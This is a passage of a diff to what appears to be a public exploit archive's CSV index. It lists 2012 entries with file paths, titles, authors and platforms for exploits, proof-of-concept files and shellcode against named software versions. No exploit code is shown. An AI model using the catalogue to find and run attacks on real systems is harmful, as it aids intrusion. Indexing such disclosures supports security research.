Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 -18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 -18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal Vulnerability",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin Vulnerability",2012-04-08,Dr.NaNo,php,webapps,0 +18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 18722,platforms/cgi/webapps/18722.txt,"ZTE Change admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 18723,platforms/multiple/remote/18723.rb,"Snort 2 DCE/RPC preprocessor Buffer Overflow",2012-04-09,metasploit,multiple,remote,0 18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 Post-Auth OS Command Injection",2012-04-09,metasploit,php,webapps,0 @@ -16176,13 +16219,13 @@ id,file,description,date,author,platform,type,port 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilites",2012-04-13,shpendk,php,webapps,0 18738,platforms/php/remote/18738.rb,"V-CMS PHP File Upload and Execute",2012-04-14,metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 +18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) SQL Injection Vulnerability",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - CSRF Add Admin",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus <= 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",2012-04-18,metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,metasploit,windows,local,0 -18749,platforms/osx/local/18749.py,"Office 2008 sp0 RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -16195,35 +16238,35 @@ id,file,description,date,author,platform,type,port 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0 +18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download Vulnerability",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 +18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0 18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 -18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - (.chm) & (.mobi) Memory Corruption",2012-04-23,shinnai,windows,dos,0 -18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 -18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0 +18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 -18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0 +18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices Backdoor Access",2012-04-24,jc,hardware,remote,0 -18780,platforms/windows/remote/18780.rb,"WIndows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,metasploit,windows,remote,0 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 +18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 -18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 -18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 -18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit",2012-04-27,"Xenithz xpt",windows,local,0 -18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 -18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 +18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 +18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit",2012-04-27,"Xenithz xpt",windows,local,0 +18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 +18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,metasploit,windows,remote,0 +18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - XSS Vulnerability",2012-04-30,Vulnerability-Lab,asp,webapps,0 @@ -16231,28 +16274,33 @@ id,file,description,date,author,platform,type,port 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 +18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",2012-05-01,metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 -18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger <= 1.2.28 - Denial of Service Vulnerability",2012-05-01,"Julien Ahrens",windows,dos,0 18817,platforms/hardware/dos/18817.py,"Mikrotik Router Denial of Service",2012-05-01,PoURaN,hardware,dos,0 18818,platforms/windows/remote/18818.py,"Solarwinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection Exploit",2012-05-01,muts,windows,remote,0 18819,platforms/windows/dos/18819.cpp,"Microsoft Windows XP - Win32k.sys Local Kernel DoS Vulnerability",2012-05-02,"Lufeng Li",windows,dos,0 18820,platforms/php/webapps/18820.php,"OpenConf <= 4.11 (author/edit.php) Remote Blind SQL Injection Exploit",2012-05-02,EgiX,php,webapps,0 -18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 +18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 18825,platforms/windows/remote/18825.rb,"VLC Mms Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 -18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,metasploit,windows,remote,0 18834,platforms/php/remote/18834.rb,"PHP CGI Argument Injection",2012-05-04,metasploit,php,remote,0 +18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 +18861,platforms/windows/local/18861.php,"PHP 5.4 (5.4.3) Code Execution (Win32)",2012-05-11,0in,windows,local,0 +18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 +18885,platforms/linux/shellcode/18885.c,"linux/x86 execve(/bin/dash) 42 bytes",2012-05-16,X-h4ck,linux,shellcode,0 +18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 18836,platforms/php/remote/18836.py,"PHP CGI Argument Injection Exploit",2012-05-05,rayh4c,php,remote,0 +18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0 18842,platforms/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 @@ -16264,80 +16312,75 @@ id,file,description,date,author,platform,type,port 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - (.gpx) Crash PoC",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 +18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 18855,platforms/linux/dos/18855.txt,"Asterisk 'ast_parse_digest()' Stack Buffer Overflow Vulnerability",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 18858,platforms/php/webapps/18858.txt,"elearning server 4g Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 -18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 -18861,platforms/windows/local/18861.php,"PHP 5.4 (5.4.3) Code Execution (Win32)",2012-05-11,0in,windows,local,0 -18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 -18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 -18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 Spam Logging PHP Injection",2012-05-12,metasploit,php,webapps,0 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,metasploit,windows,remote,0 -18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 +18868,platforms/php/webapps/18868.txt,"Sockso <= 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,metasploit,windows,remote,0 -18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette (picture.php) SQL Injection Vulnerability",2012-05-13,sbz,php,webapps,0 +18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 +18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 -18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass Vulnerability",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 Backend XSS And SQLi Vulnerability",2012-05-08,"Stefan Schurtz",php,webapps,0 -18885,platforms/linux/shellcode/18885.c,"linux/x86 execve(/bin/dash) 42 bytes",2012-05-16,X-h4ck,linux,shellcode,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Multiple Vulnerabilities (CSRF - Persistent XSS)",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 +18909,platforms/php/dos/18909.php,"PHP <= 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0day)",2012-05-18,Cr4sh,windows,dos,0 -18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 -18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18898,platforms/php/remote/18898.rb,"Active Collab ""chat module"" <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 +18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection and XSS Vulnerabilties",2012-05-19,blake,php,webapps,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 -18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 -18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 -18909,platforms/php/dos/18909.php,"PHP <= 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews <= 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 +18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation Exploit",2012-05-22,sickness,windows,local,0 +18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager lmgrd Buffer Overflow",2012-05-23,metasploit,windows,remote,0 +18922,platforms/php/webapps/18922.rb,"appRain CMF Arbitrary PHP File Upload Vulnerability",2012-05-25,metasploit,php,webapps,0 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE PoC",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Mod_Auth_OpenID Session Stealing Vulnerability",2012-05-24,"Peter Ellehauge",linux,local,0 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service Vulnerability",2012-05-24,"Klaus Heckelmann",multiple,dos,0 18921,platforms/php/webapps/18921.txt,"Jaow <= 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 -18922,platforms/php/webapps/18922.rb,"appRain CMF Arbitrary PHP File Upload Vulnerability",2012-05-25,metasploit,php,webapps,0 18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 -18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 -18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 +18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 +18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal Vulnerability",2012-05-27,metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 -18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 -18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - (.rtf) FileOpen Crash",2012-05-28,shinnai,windows,dos,0 -18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0 +18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 +18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 +18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 - (.rtf) FileOpen Crash",2012-05-28,shinnai,windows,dos,0 +18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 -18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 +19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog Buffer Overflow 2.07.14",2012-06-08,metasploit,windows,remote,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - (.doc) Null Pointer Dereference Vulnerability",2012-05-30,condis,windows,dos,0 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,metasploit,windows,local,0 @@ -16349,62 +16392,49 @@ id,file,description,date,author,platform,type,port 18960,platforms/php/webapps/18960.txt,"NewsAdd <= 1.0 (lerNoticia.php id) SQL Injection Vulnerability",2012-05-31,"Yakir Wizman",php,webapps,0 18961,platforms/php/webapps/18961.txt,"Supernews <= 2.6.1 (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 -18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 -18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 